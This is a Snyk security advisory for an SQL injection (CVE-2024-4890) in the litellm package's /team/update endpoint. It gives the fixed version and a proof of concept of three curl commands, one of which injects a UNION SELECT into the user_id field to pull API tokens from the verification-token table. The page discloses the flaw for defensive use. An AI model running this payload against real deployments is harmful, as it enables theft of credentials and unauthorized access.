Homepage

SQL Injection Affecting litellm package, versions [,1.49.6)

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (24th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about SQL Injection vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PYTHON-LITELLM-7218854
  • published7 Jun 2024
  • disclosed6 Jun 2024
  • creditmvlttt
Report a new vulnerability Found a mistake?

Introduced: 6 Jun 2024

CVE-2024-4890  (opens in a new tab)
CWE-89  (opens in a new tab)

How to fix?

Upgrade litellm to version 1.49.6 or higher.

Overview

litellm is a Library to easily interface with LLM API providers

Affected versions of this package are vulnerable to SQL Injection through the /team/update process. An attacker can extract or manipulate sensitive data by injecting malicious SQL commands into the user_id parameter.

PoC

curl http://localhost:8000/team/update -X POST -H "Authorization: Bearer sk-app_user_token" -H "Content-Type: application/json" -d "{\"team_id\":\"45e3e396-ee08-4a61-a88e-16b3ce7e0849\",\"members_with_roles\":[{\"role\":\"user\",\"user_id\":\"test\"},{\"role\":\"user\",\"user_id\":\"') UNION SELECT 'test', '',ARRAY[token], '', NULL, 0, '', '{}', NULL, NULL, NULL, '', NULL, '{}', '{}', '{}' from \\\"LiteLLM_VerificationToken\\\" where user_id='default_user_id' limit 1-- -\"}]}"

curl http://localhost:8000/team/update -X POST -H "Authorization: Bearer sk-app_user_token" -H "Content-Type: application/json" -d "{\"team_id\":\"45e3e396-ee08-4a61-a88e-16b3ce7e0849\",\"members_with_roles\":[{\"role\":\"user\",\"user_id\":\"test\"}]}"

curl "http://localhost:8000/user/info?user_id=test" -H "Authorization: Bearer sk-app_user_token"

CVSS Scores

version 3.1